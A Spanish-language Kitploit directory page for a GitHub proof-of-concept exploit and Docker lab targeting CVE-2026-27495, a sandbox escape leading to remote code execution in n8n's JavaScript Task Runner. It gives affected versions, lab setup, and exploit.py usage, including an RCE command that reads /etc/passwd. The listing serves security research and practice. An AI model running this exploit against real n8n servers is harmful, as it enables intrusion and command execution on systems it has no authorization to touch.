Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-27495 — Exploit de prueba de concepto y entorno de laboratorio para CVE-2026-27495 | Kitploit
Herramientas/GitHubGitHub/dexsemon/cve-2026-27495
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónAprendizaje y EducaciónExplotación de BinariosLabs y Práctica
GitHubdexsemon/cve-2026-27495

CVE-2026-27495

Exploit de prueba de concepto y entorno de laboratorio para CVE-2026-27495

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-27495 — Escape de sandbox en el Task Runner de JS de n8n

Escape de sandbox en el Task Runner de JavaScript de n8n mediante una fuga de objetos del host-realm.

CVECVE-2026-27495
CVSS9.4 (Crítico)
CWECWE-94 — Inyección de código
Afectadon8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0
Corregido1.123.22 / 2.9.3 / 2.10.1
Superficie de ataqueNodo de código (autenticado, Task Runners habilitados)

Inicio rápido

1. Desplegar laboratorio vulnerable

root@kitploit:~
docker compose up -d

Espera ~15s a que n8n se inicie, luego abre http://localhost:5678 y crea una cuenta de propietario (correo: [email protected], contraseña: TestPassword123!).

2. Instalar dependencias

root@kitploit:~
pip install requests

3. Explotación

Probar el escape de sandbox :

root@kitploit:~
python3 exploit.py --probe

RCE — descomenta NODE_FUNCTION_ALLOW_BUILTIN=* en docker-compose.yml y reinicia:

root@kitploit:~
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"

Configuración inicial (crea la cuenta de propietario automáticamente):

root@kitploit:~
python3 exploit.py --setup --probe

Uso

root@kitploit:~
Options:
  --url URL            n8n base URL (default: http://localhost:5678)
  --email EMAIL        Login email (default: [email protected])
  --password PASSWORD  Login password
  --cmd CMD            OS command to execute (RCE)
  --setup              Create owner account (fresh instance)
  --probe              Probe sandbox escape only (no RCE, works with any config)
  --proxy PROXY        HTTP proxy (e.g. http://127.0.0.1:8080)

Descargo de responsabilidad

Solo para investigación de seguridad autorizada y fines educativos.

Descargar herramienta